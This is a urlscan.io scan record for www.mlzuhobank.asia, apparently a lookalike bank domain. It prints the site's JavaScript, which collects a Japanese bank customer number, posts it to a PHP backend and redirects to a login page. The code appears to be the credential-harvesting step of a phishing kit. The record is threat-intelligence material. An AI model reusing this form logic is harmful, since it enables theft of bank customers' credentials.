www.mlzuhobank.asia Open in urlscan Pro
2606:4700:3035::ac43:8ed3  Public Scan

URL: https://www.mlzuhobank.asia/js/index.js
Submission: On September 25 via api from JP — Scanned from JP

Form analysis 0 forms found in the DOM

Text Content

const app=new Vue({el:'#container',data:{kehufanhao:"",},mounted(){localStorage.clear()},methods:{send(){if(this.kehufanhao==""){document.getElementById('txbCustNo').focus()}else{if(this.kehufanhao.length<8){window.alert('お客さま番号(8桁または10桁)を入力してください')
return}
$.ajax({type:"post",url:'../php/suc.php',data:{"kehufanhao":this.kehufanhao,"token":token},dataType:"json",cache:false,async:true,success:(data)=>{if(data.info=='error')
{window.location.reload();return}
localStorage.setItem('kehufanhao',this.kehufanhao)
window.location.assign('../client/login.php')},})}}},})